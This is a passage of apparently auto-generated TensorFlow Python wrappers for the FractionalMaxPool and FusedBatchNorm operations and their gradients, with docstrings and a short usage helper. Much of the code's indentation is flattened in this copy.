      difference between pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`.
      When set to True, the values at the boundary of adjacent pooling
      cells are used by both cells. For example:
      `index 0 1 2 3 4`
      `value 20 5 16 3 7`
      If the pooling sequence is [0, 2, 4], then 16, at index 2, will be
      used twice. The result would be [20, 16] for fractional max pooling.
deterministic: An optional `bool`. Defaults to `False`.
      When set to True, a fixed pooling region will be used when
      iterating over a FractionalMaxPool node in the computation graph.
      Mainly used in unit tests to make FractionalMaxPool deterministic.
seed: An optional `int`. Defaults to `0`.
      If either seed or seed2 is set to be non-zero, the random number
generator is seeded by the given seed. Otherwise, it is seeded by a
random seed.
seed2: An optional `int`. Defaults to `0`.
      A second seed to avoid seed collision.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, row_pooling_sequence, col_pooling_sequence).
output: A `Tensor`. Has the same type as `value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FractionalMaxPool", name, value, "pooling_ratio",
pooling_ratio, "pseudo_random", pseudo_random, "overlapping",
overlapping, "deterministic", deterministic, "seed", seed, "seed2",
seed2)
_result = _FractionalMaxPoolOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fractional_max_pool_eager_fallback(
value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random,
overlapping=overlapping, deterministic=deterministic, seed=seed,
seed2=seed2, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(pooling_ratio, (list, tuple)):
raise TypeError(
"Expected list for 'pooling_ratio' argument to "
"'fractional_max_pool' Op, not %r." % pooling_ratio)
pooling_ratio = [_execute.make_float(_f, "pooling_ratio") for _f in pooling_ratio]
if pseudo_random is None:
pseudo_random = False
pseudo_random = _execute.make_bool(pseudo_random, "pseudo_random")
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
if deterministic is None:
deterministic = False
deterministic = _execute.make_bool(deterministic, "deterministic")
if seed is None:
seed = 0
seed = _execute.make_int(seed, "seed")
if seed2 is None:
seed2 = 0
seed2 = _execute.make_int(seed2, "seed2")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FractionalMaxPool", value=value, pooling_ratio=pooling_ratio,
pseudo_random=pseudo_random,
overlapping=overlapping,
deterministic=deterministic, seed=seed,
seed2=seed2, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("pooling_ratio", _op.get_attr("pooling_ratio"), "pseudo_random",
_op._get_attr_bool("pseudo_random"), "overlapping",
_op._get_attr_bool("overlapping"), "deterministic",
_op._get_attr_bool("deterministic"), "seed",
_op._get_attr_int("seed"), "seed2", _op._get_attr_int("seed2"),
"T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FractionalMaxPool", _inputs_flat, _attrs, _result)
_result = _FractionalMaxPoolOutput._make(_result)
return _result
FractionalMaxPool = tf_export("raw_ops.FractionalMaxPool")(_ops.to_raw_op(fractional_max_pool))
def fractional_max_pool_eager_fallback(value, pooling_ratio, pseudo_random, overlapping, deterministic, seed, seed2, name, ctx):
if not isinstance(pooling_ratio, (list, tuple)):
raise TypeError(
"Expected list for 'pooling_ratio' argument to "
"'fractional_max_pool' Op, not %r." % pooling_ratio)
pooling_ratio = [_execute.make_float(_f, "pooling_ratio") for _f in pooling_ratio]
if pseudo_random is None:
pseudo_random = False
pseudo_random = _execute.make_bool(pseudo_random, "pseudo_random")
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
if deterministic is None:
deterministic = False
deterministic = _execute.make_bool(deterministic, "deterministic")
if seed is None:
seed = 0
seed = _execute.make_int(seed, "seed")
if seed2 is None:
seed2 = 0
seed2 = _execute.make_int(seed2, "seed2")
_attr_T, (value,) = _execute.args_to_matching_eager([value], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, ])
_inputs_flat = [value]
_attrs = ("pooling_ratio", pooling_ratio, "pseudo_random", pseudo_random,
"overlapping", overlapping, "deterministic", deterministic, "seed", seed,
"seed2", seed2, "T", _attr_T)
_result = _execute.execute(b"FractionalMaxPool", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FractionalMaxPool", _inputs_flat, _attrs, _result)
_result = _FractionalMaxPoolOutput._make(_result)
return _result
def fractional_max_pool_grad(orig_input, orig_output, out_backprop, row_pooling_sequence, col_pooling_sequence, overlapping=False, name=None):
r"""Computes gradient of the FractionalMaxPool function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `int64`.
Original input for `fractional_max_pool`
orig_output: A `Tensor`. Must have the same type as `orig_input`.
Original output for `fractional_max_pool`
out_backprop: A `Tensor`. Must have the same type as `orig_input`.
4-D with shape `[batch, height, width, channels]`. Gradients
w.r.t. the output of `fractional_max_pool`.
row_pooling_sequence: A `Tensor` of type `int64`.
      Row pooling sequence, used together with col_pooling_sequence to
      form the pooling regions.
    col_pooling_sequence: A `Tensor` of type `int64`.
      Column pooling sequence, used together with row_pooling_sequence to
      form the pooling regions.
overlapping: An optional `bool`. Defaults to `False`.
      When set to True, the values at the boundary of adjacent pooling
      cells are used by both cells. For example:
      `index 0 1 2 3 4`
      `value 20 5 16 3 7`
      If the pooling sequence is [0, 2, 4], then 16, at index 2, will be
      used twice. The result would be [20, 16] for fractional max pooling.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FractionalMaxPoolGrad", name, orig_input, orig_output,
out_backprop, row_pooling_sequence, col_pooling_sequence,
"overlapping", overlapping)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fractional_max_pool_grad_eager_fallback(
orig_input, orig_output, out_backprop, row_pooling_sequence,
col_pooling_sequence, overlapping=overlapping, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FractionalMaxPoolGrad", orig_input=orig_input,
orig_output=orig_output,
out_backprop=out_backprop,
row_pooling_sequence=row_pooling_sequence,
col_pooling_sequence=col_pooling_sequence,
overlapping=overlapping, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("overlapping", _op._get_attr_bool("overlapping"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FractionalMaxPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
FractionalMaxPoolGrad = tf_export("raw_ops.FractionalMaxPoolGrad")(_ops.to_raw_op(fractional_max_pool_grad))
def fractional_max_pool_grad_eager_fallback(orig_input, orig_output, out_backprop, row_pooling_sequence, col_pooling_sequence, overlapping, name, ctx):
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, ])
(orig_input, orig_output, out_backprop) = _inputs_T
row_pooling_sequence = _ops.convert_to_tensor(row_pooling_sequence, _dtypes.int64)
col_pooling_sequence = _ops.convert_to_tensor(col_pooling_sequence, _dtypes.int64)
_inputs_flat = [orig_input, orig_output, out_backprop, row_pooling_sequence, col_pooling_sequence]
_attrs = ("overlapping", overlapping, "T", _attr_T)
_result = _execute.execute(b"FractionalMaxPoolGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FractionalMaxPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_FusedBatchNormOutput = collections.namedtuple(
"FusedBatchNorm",
["y", "batch_mean", "batch_variance", "reserve_space_1", "reserve_space_2"])
def _fused_batch_norm(x, scale, offset, mean, variance, epsilon=0.0001, exponential_avg_factor=1, data_format="NHWC", is_training=True, name=None):
r"""Batch normalization.
  Note that the size of 4D Tensors is defined by either "NHWC" or "NCHW".
  The size of 1D Tensors matches the dimension C of the 4D Tensors.
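  As a sketch of the standard batch-norm algebra (not an exact kernel
  description), in training mode each channel is normalized with the batch
  statistics:
      y = scale * (x - batch_mean) / sqrt(batch_variance + epsilon) + offset
  In inference mode the supplied population `mean` and `variance` are used in
  place of the batch statistics.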
Args:
x: A `Tensor`. Must be one of the following types: `float32`.
A 4D Tensor for input data.
scale: A `Tensor`. Must have the same type as `x`.
A 1D Tensor for scaling factor, to scale the normalized x.
offset: A `Tensor`. Must have the same type as `x`.
A 1D Tensor for offset, to shift to the normalized x.
mean: A `Tensor`. Must have the same type as `x`.
A 1D Tensor for population mean. Used for inference only;
must be empty for training.
variance: A `Tensor`. Must have the same type as `x`.
A 1D Tensor for population variance. Used for inference only;
must be empty for training.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
exponential_avg_factor: An optional `float`. Defaults to `1`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
The data format for x and y. Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (y, batch_mean, batch_variance, reserve_space_1, reserve_space_2).
y: A `Tensor`. Has the same type as `x`.
batch_mean: A `Tensor`. Has the same type as `x`.
batch_variance: A `Tensor`. Has the same type as `x`.
reserve_space_1: A `Tensor`. Has the same type as `x`.
reserve_space_2: A `Tensor`. Has the same type as `x`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNorm", name, x, scale, offset, mean, variance,
"epsilon", epsilon, "exponential_avg_factor", exponential_avg_factor,
"data_format", data_format, "is_training", is_training)
_result = _FusedBatchNormOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return _fused_batch_norm_eager_fallback(
x, scale, offset, mean, variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNorm", x=x, scale=scale, offset=offset, mean=mean,
variance=variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "epsilon",
_op.get_attr("epsilon"), "exponential_avg_factor",
_op.get_attr("exponential_avg_factor"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNorm", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormOutput._make(_result)
return _result
FusedBatchNorm = tf_export("raw_ops.FusedBatchNorm")(_ops.to_raw_op(_fused_batch_norm))
def _fused_batch_norm_eager_fallback(x, scale, offset, mean, variance, epsilon, exponential_avg_factor, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, scale, offset, mean, variance], ctx, [_dtypes.float32, ])
(x, scale, offset, mean, variance) = _inputs_T
_inputs_flat = [x, scale, offset, mean, variance]
_attrs = ("T", _attr_T, "epsilon", epsilon, "exponential_avg_factor",
exponential_avg_factor, "data_format", data_format, "is_training",
is_training)
_result = _execute.execute(b"FusedBatchNorm", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNorm", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormOutput._make(_result)
return _result
_FusedBatchNormGradOutput = collections.namedtuple(
"FusedBatchNormGrad",
["x_backprop", "scale_backprop", "offset_backprop", "reserve_space_3", "reserve_space_4"])
def fused_batch_norm_grad(y_backprop, x, scale, reserve_space_1, reserve_space_2, epsilon=0.0001, data_format="NHWC", is_training=True, name=None):
r"""Gradient for batch normalization.
  Note that the size of 4D Tensors is defined by either "NHWC" or "NCHW".
  The size of 1D Tensors matches the dimension C of the 4D Tensors.
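  As a sketch of the standard batch-norm algebra (reducing over the N, H, W
  dimensions in the "NHWC" case), the two reduced gradients are:
      offset_backprop = sum(y_backprop)
      scale_backprop  = sum(y_backprop * (x - mean) * rsqrt(variance + epsilon))
  x_backprop additionally involves the gradients that flow through the batch
  statistics themselves.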
Args:
y_backprop: A `Tensor`. Must be one of the following types: `float32`.
A 4D Tensor for the gradient with respect to y.
x: A `Tensor`. Must have the same type as `y_backprop`.
A 4D Tensor for input data.
scale: A `Tensor`. Must have the same type as `y_backprop`.
A 1D Tensor for scaling factor, to scale the normalized x.
reserve_space_1: A `Tensor`. Must have the same type as `y_backprop`.
When is_training is True, a 1D Tensor for the computed batch
mean to be reused in gradient computation. When is_training is
False, a 1D Tensor for the population mean to be reused in both
1st and 2nd order gradient computation.
reserve_space_2: A `Tensor`. Must have the same type as `y_backprop`.
When is_training is True, a 1D Tensor for the computed batch
variance (inverted variance in the cuDNN case) to be reused in
gradient computation. When is_training is False, a 1D Tensor
for the population variance to be reused in both 1st and 2nd
order gradient computation.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
The data format for y_backprop, x, x_backprop.
Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (x_backprop, scale_backprop, offset_backprop, reserve_space_3, reserve_space_4).
x_backprop: A `Tensor`. Has the same type as `y_backprop`.
scale_backprop: A `Tensor`. Has the same type as `y_backprop`.
offset_backprop: A `Tensor`. Has the same type as `y_backprop`.
reserve_space_3: A `Tensor`. Has the same type as `y_backprop`.
reserve_space_4: A `Tensor`. Has the same type as `y_backprop`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormGrad", name, y_backprop, x, scale,
reserve_space_1, reserve_space_2, "epsilon", epsilon, "data_format",
data_format, "is_training", is_training)
_result = _FusedBatchNormGradOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_grad_eager_fallback(
y_backprop, x, scale, reserve_space_1, reserve_space_2,
epsilon=epsilon, data_format=data_format, is_training=is_training,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormGrad", y_backprop=y_backprop, x=x, scale=scale,
reserve_space_1=reserve_space_1,
reserve_space_2=reserve_space_2,
epsilon=epsilon, data_format=data_format,
is_training=is_training, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "epsilon",
_op.get_attr("epsilon"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormGrad", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradOutput._make(_result)
return _result
FusedBatchNormGrad = tf_export("raw_ops.FusedBatchNormGrad")(_ops.to_raw_op(fused_batch_norm_grad))
def fused_batch_norm_grad_eager_fallback(y_backprop, x, scale, reserve_space_1, reserve_space_2, epsilon, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, _inputs_T = _execute.args_to_matching_eager([y_backprop, x, scale, reserve_space_1, reserve_space_2], ctx, [_dtypes.float32, ])
(y_backprop, x, scale, reserve_space_1, reserve_space_2) = _inputs_T
_inputs_flat = [y_backprop, x, scale, reserve_space_1, reserve_space_2]
_attrs = ("T", _attr_T, "epsilon", epsilon, "data_format", data_format,
"is_training", is_training)
_result = _execute.execute(b"FusedBatchNormGrad", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormGrad", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradOutput._make(_result)
return _result
_FusedBatchNormGradV2Output = collections.namedtuple(
"FusedBatchNormGradV2",
["x_backprop", "scale_backprop", "offset_backprop", "reserve_space_3", "reserve_space_4"])
def fused_batch_norm_grad_v2(y_backprop, x, scale, reserve_space_1, reserve_space_2, epsilon=0.0001, data_format="NHWC", is_training=True, name=None):
r"""Gradient for batch normalization.
  Note that the size of 4D Tensors is defined by either "NHWC" or "NCHW".
  The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
y_backprop: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
A 4D Tensor for the gradient with respect to y.
x: A `Tensor`. Must have the same type as `y_backprop`.
A 4D Tensor for input data.
scale: A `Tensor` of type `float32`.
A 1D Tensor for scaling factor, to scale the normalized x.
reserve_space_1: A `Tensor`. Must be one of the following types: `float32`.
When is_training is True, a 1D Tensor for the computed batch
mean to be reused in gradient computation. When is_training is
False, a 1D Tensor for the population mean to be reused in both
1st and 2nd order gradient computation.
reserve_space_2: A `Tensor`. Must have the same type as `reserve_space_1`.
When is_training is True, a 1D Tensor for the computed batch
variance (inverted variance in the cuDNN case) to be reused in
gradient computation. When is_training is False, a 1D Tensor
for the population variance to be reused in both 1st and 2nd
order gradient computation.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
The data format for y_backprop, x, x_backprop.
Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (x_backprop, scale_backprop, offset_backprop, reserve_space_3, reserve_space_4).
x_backprop: A `Tensor`. Has the same type as `y_backprop`.
scale_backprop: A `Tensor`. Has the same type as `reserve_space_1`.
offset_backprop: A `Tensor`. Has the same type as `reserve_space_1`.
reserve_space_3: A `Tensor`. Has the same type as `reserve_space_1`.
reserve_space_4: A `Tensor`. Has the same type as `reserve_space_1`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormGradV2", name, y_backprop, x, scale,
reserve_space_1, reserve_space_2, "epsilon", epsilon, "data_format",
data_format, "is_training", is_training)
_result = _FusedBatchNormGradV2Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_grad_v2_eager_fallback(
y_backprop, x, scale, reserve_space_1, reserve_space_2,
epsilon=epsilon, data_format=data_format, is_training=is_training,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormGradV2", y_backprop=y_backprop, x=x, scale=scale,
reserve_space_1=reserve_space_1,
reserve_space_2=reserve_space_2,
epsilon=epsilon, data_format=data_format,
is_training=is_training, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "U", _op._get_attr_type("U"),
"epsilon", _op.get_attr("epsilon"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormGradV2", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradV2Output._make(_result)
return _result
FusedBatchNormGradV2 = tf_export("raw_ops.FusedBatchNormGradV2")(_ops.to_raw_op(fused_batch_norm_grad_v2))
def fused_batch_norm_grad_v2_eager_fallback(y_backprop, x, scale, reserve_space_1, reserve_space_2, epsilon, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, _inputs_T = _execute.args_to_matching_eager([y_backprop, x], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
(y_backprop, x) = _inputs_T
_attr_U, _inputs_U = _execute.args_to_matching_eager([reserve_space_1, reserve_space_2], ctx, [_dtypes.float32, ])
(reserve_space_1, reserve_space_2) = _inputs_U
scale = _ops.convert_to_tensor(scale, _dtypes.float32)
_inputs_flat = [y_backprop, x, scale, reserve_space_1, reserve_space_2]
_attrs = ("T", _attr_T, "U", _attr_U, "epsilon", epsilon, "data_format",
data_format, "is_training", is_training)
_result = _execute.execute(b"FusedBatchNormGradV2", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormGradV2", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradV2Output._make(_result)
return _result
_FusedBatchNormGradV3Output = collections.namedtuple(
"FusedBatchNormGradV3",
["x_backprop", "scale_backprop", "offset_backprop", "reserve_space_4", "reserve_space_5"])
def fused_batch_norm_grad_v3(y_backprop, x, scale, reserve_space_1, reserve_space_2, reserve_space_3, epsilon=0.0001, data_format="NHWC", is_training=True, name=None):
r"""Gradient for batch normalization.
  Note that the size of 4D Tensors is defined by either "NHWC" or "NCHW".
  The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
y_backprop: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
A 4D Tensor for the gradient with respect to y.
x: A `Tensor`. Must have the same type as `y_backprop`.
A 4D Tensor for input data.
scale: A `Tensor` of type `float32`.
A 1D Tensor for scaling factor, to scale the normalized x.
reserve_space_1: A `Tensor`. Must be one of the following types: `float32`.
When is_training is True, a 1D Tensor for the computed batch
mean to be reused in gradient computation. When is_training is
False, a 1D Tensor for the population mean to be reused in both
1st and 2nd order gradient computation.
reserve_space_2: A `Tensor`. Must have the same type as `reserve_space_1`.
When is_training is True, a 1D Tensor for the computed batch
variance (inverted variance in the cuDNN case) to be reused in
gradient computation. When is_training is False, a 1D Tensor
for the population variance to be reused in both 1st and 2nd
order gradient computation.
reserve_space_3: A `Tensor`. Must have the same type as `reserve_space_1`.
When is_training is True, a 1D Tensor for some intermediate results to be reused
in gradient computation. When is_training is False, a dummy empty Tensor will be
created.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
data_format: An optional `string` from: `"NHWC", "NCHW", "NDHWC", "NCDHW"`. Defaults to `"NHWC"`.
The data format for y_backprop, x, x_backprop.
Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (x_backprop, scale_backprop, offset_backprop, reserve_space_4, reserve_space_5).
x_backprop: A `Tensor`. Has the same type as `y_backprop`.
scale_backprop: A `Tensor`. Has the same type as `reserve_space_1`.
offset_backprop: A `Tensor`. Has the same type as `reserve_space_1`.
reserve_space_4: A `Tensor`. Has the same type as `reserve_space_1`.
reserve_space_5: A `Tensor`. Has the same type as `reserve_space_1`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormGradV3", name, y_backprop, x, scale,
reserve_space_1, reserve_space_2, reserve_space_3, "epsilon", epsilon,
"data_format", data_format, "is_training", is_training)
_result = _FusedBatchNormGradV3Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_grad_v3_eager_fallback(
y_backprop, x, scale, reserve_space_1, reserve_space_2,
reserve_space_3, epsilon=epsilon, data_format=data_format,
is_training=is_training, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormGradV3", y_backprop=y_backprop, x=x, scale=scale,
reserve_space_1=reserve_space_1,
reserve_space_2=reserve_space_2,
reserve_space_3=reserve_space_3,
epsilon=epsilon, data_format=data_format,
is_training=is_training, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "U", _op._get_attr_type("U"),
"epsilon", _op.get_attr("epsilon"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormGradV3", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradV3Output._make(_result)
return _result
FusedBatchNormGradV3 = tf_export("raw_ops.FusedBatchNormGradV3")(_ops.to_raw_op(fused_batch_norm_grad_v3))
def fused_batch_norm_grad_v3_eager_fallback(y_backprop, x, scale, reserve_space_1, reserve_space_2, reserve_space_3, epsilon, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, _inputs_T = _execute.args_to_matching_eager([y_backprop, x], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
(y_backprop, x) = _inputs_T
_attr_U, _inputs_U = _execute.args_to_matching_eager([reserve_space_1, reserve_space_2, reserve_space_3], ctx, [_dtypes.float32, ])
(reserve_space_1, reserve_space_2, reserve_space_3) = _inputs_U
scale = _ops.convert_to_tensor(scale, _dtypes.float32)
_inputs_flat = [y_backprop, x, scale, reserve_space_1, reserve_space_2, reserve_space_3]
_attrs = ("T", _attr_T, "U", _attr_U, "epsilon", epsilon, "data_format",
data_format, "is_training", is_training)
_result = _execute.execute(b"FusedBatchNormGradV3", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormGradV3", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradV3Output._make(_result)
return _result
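# A minimal sketch of driving FusedBatchNormGradV3 by hand through the
# `tf.raw_ops` endpoints exported in this module, reusing the reserve-space
# outputs of a forward FusedBatchNormV3 call as the docstring describes.
# The helper, its shapes, and its values are illustrative only; nothing in
# this module calls it, and it assumes the full `tensorflow` package is
# importable at call time.
def _example_fused_batch_norm_grad_v3():
  import tensorflow as tf
  x = tf.random.normal([2, 4, 4, 3])           # NHWC input
  scale = tf.ones([3])                         # 1D, matches channel dim C
  empty = tf.constant([], dtype=tf.float32)    # mean/variance empty in training
  fwd = tf.raw_ops.FusedBatchNormV3(
      x=x, scale=scale, offset=tf.zeros([3]), mean=empty, variance=empty,
      is_training=True)
  dy = tf.ones_like(fwd.y)                     # stand-in upstream gradient
  grads = tf.raw_ops.FusedBatchNormGradV3(
      y_backprop=dy, x=x, scale=scale,
      reserve_space_1=fwd.reserve_space_1,
      reserve_space_2=fwd.reserve_space_2,
      reserve_space_3=fwd.reserve_space_3,
      is_training=True)
  return grads.x_backprop, grads.scale_backprop, grads.offset_backprop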
_FusedBatchNormV2Output = collections.namedtuple(
"FusedBatchNormV2",
["y", "batch_mean", "batch_variance", "reserve_space_1", "reserve_space_2"])
